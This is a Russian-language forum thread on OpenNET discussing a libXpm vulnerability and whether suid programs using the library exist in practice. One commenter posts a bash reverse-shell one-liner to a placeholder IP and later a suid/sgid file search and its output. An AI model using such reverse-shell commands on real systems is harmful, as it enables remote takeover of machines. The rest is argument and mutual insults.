The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Вариант для распечатки  
Пред. тема | След. тема 
Форум Разговоры, обсуждение новостей
Режим отображения отдельной подветви беседы [ Отслеживать ]

Оглавление

Уязвимость в libXpm, приводящая к выполнению кода, opennews (??), 21-Янв-23, (0) [смотреть все]

Сообщения [Сортировка по времени | RSS]


2. "Уязвимость в libXpm, приводящая к выполнению кода"  +6 +/
Сообщение от Аноним (1), 21-Янв-23, 11:13 
> Атака сводится к размещению в доступном пользователю каталоге, присутствующем в списке PATH, собственных исполняемых файлов

Ну а это вообще жесть :)

Ответить | Правка | Наверх | Cообщить модератору

3. "Уязвимость в libXpm, приводящая к выполнению кода"  +3 +/
Сообщение от Аноним (3), 21-Янв-23, 12:01 
По сути, не отличается от подмены утилиты или библиотеки на левую. Вы обречены.
Ответить | Правка | Наверх | Cообщить модератору

19. "Уязвимость в libXpm, приводящая к выполнению кода"  –1 +/
Сообщение от Аноним (1), 21-Янв-23, 14:14 
> не отличается от подмены утилиты или библиотеки на левую

Вот с этого и надо было статью начинать: "сначала надо подменить систему".

Ответить | Правка | Наверх | Cообщить модератору

11. "Уязвимость в libXpm, приводящая к выполнению кода"  +5 +/
Сообщение от An onymous (?), 21-Янв-23, 12:43 
warning! Пользователь может запустить под собой какую-то программу!
Ответить | Правка | К родителю #2 | Наверх | Cообщить модератору

40. "Уязвимость в libXpm, приводящая к выполнению кода"  +1 +/
Сообщение от Аноним (40), 21-Янв-23, 16:34 
Warning. Программа с suid бит может запустить под root какую-то программу вместо gzip
Ответить | Правка | Наверх | Cообщить модератору

47. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Admino (ok), 21-Янв-23, 18:00 
А что за программа-то?
Ответить | Правка | Наверх | Cообщить модератору

51. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от OpenEcho (?), 21-Янв-23, 18:36 
> А что за программа-то?

    bash -i >& /dev/udp/1.2.3.4/1337 0>&1

Ответить | Правка | Наверх | Cообщить модератору

54. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Admino (ok), 21-Янв-23, 19:38 
С правами рута и с использованием libXpm?

Отсыпь.

Ответить | Правка | Наверх | Cообщить модератору

108. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от OpenEcho (?), 23-Янв-23, 19:35 
> Отсыпь.

Но, тебе уже и так хватит :)

Но если хочешь чтоб быстрей отпустило, дай доступ на ограниченый экаунт в которм суидишная компроментированная/вулнерабная прожка есть

Ответить | Правка | Наверх | Cообщить модератору

109. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Admino (ok), 23-Янв-23, 19:45 
Так вот мне и интересно было, где это в дистрибутивах встречается графическая тулза с суидом и libXpm.
Ответить | Правка | Наверх | Cообщить модератору

117. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от OpenEcho (?), 25-Янв-23, 00:03 
> Так вот мне и интересно было, где это в дистрибутивах встречается графическая
> тулза с суидом и libXpm.

А-а-а, вы о этом, сори, не понял... к сожалению помимо безобидного текстового XPM, есть еще

```
<xmp>

find . -perm /6000
./usr/bin/fusermount3
./usr/bin/wall
./usr/bin/passwd
./usr/bin/newgrp
./usr/bin/gpasswd
./usr/bin/chsh
./usr/bin/su
./usr/bin/expiry
./usr/bin/mount
./usr/bin/umount
./usr/bin/sudo
./usr/bin/mlocate
./usr/bin/chage
./usr/bin/ssh-agent
./usr/bin/write.ul
./usr/bin/dotlockfile
./usr/bin/crontab
./usr/bin/chfn
./usr/sbin/unix_chkpwd
./usr/lib/dbus-1.0/dbus-daemon-launch-helper
./usr/lib/x86_64-linux-gnu/utempter/utempter
./usr/lib/openssh/ssh-keysign
./usr/local/share/fonts
./run/log/journal
./var/log/journal
./var/log/journal/0289d16f3787f03a0475a594054e4e77
./var/mail
./var/local

</xmp>
```

Ответить | Правка | Наверх | Cообщить модератору

118. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Admino (ok), 25-Янв-23, 00:08 
Зачем ты привёл кучу текстовых утилит, которые к libXpm никаким боком отношения не имеют? Не говоря уже про логи?

Ты ChatGPT, что ли?

Ответить | Правка | Наверх | Cообщить модератору

121. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от OpenEcho (?), 25-Янв-23, 19:55 
> Зачем ты привёл кучу текстовых утилит,

Это /usr/bin/passwd текстовая утилита ?

> которые к libXpm никаким боком отношения не имеют?

А мы разве не отошли он libXPM и говорим про программы которые работают под SUID/GUID ?

>Не говоря уже про логи?

Это не логи, это выхлоп от

find . -perm /6000

который в данном случае искал на ванильном дебиане все программы от корня на которых установлен SUID/GUID

> Ты ChatGPT, что ли?

Платить калеки ChatGPT чтоб развлекать местных анонимов?! А вы батенька шутник...

Ответить | Правка | Наверх | Cообщить модератору

122. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от Admino (ok), 25-Янв-23, 20:01 
> Это /usr/bin/passwd текстовая утилита ?

Это троллинг тупостью? Да, /usr/bin/passwd - это текстовая утилита.

> А мы разве не отошли он libXPM и говорим про программы которые
> работают под SUID/GUID ?

Для эксплуатации уязвимости требуется а) программа, использующая libXpm и б) программа, имеющая suid бит.

Условия а) и б) должны выполняться одновременно.

Я таких программ в современном дистрибутиве не нашёл. Теперь ты мне приводишь вывод find, в котором логи и куча консольщины. Зачем?

> Это не логи, это выхлоп от
> find . -perm /6000
> который в данном случае искал на ванильном дебиане все программы от корня
> на которых установлен SUID/GUID

И нашёл логи, потому что там на каталогах SGID.

Ответить | Правка | Наверх | Cообщить модератору

123. "Уязвимость в libXpm, приводящая к выполнению кода"  +/
Сообщение от OpenEcho (?), 26-Янв-23, 00:28 
> Это троллинг тупостью? Да, /usr/bin/passwd - это текстовая утилита.

О-о-о, понятно, еще один умный пуп, ну-ну  смакуй дальше сам какой ты "умный"

Ответить | Правка | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру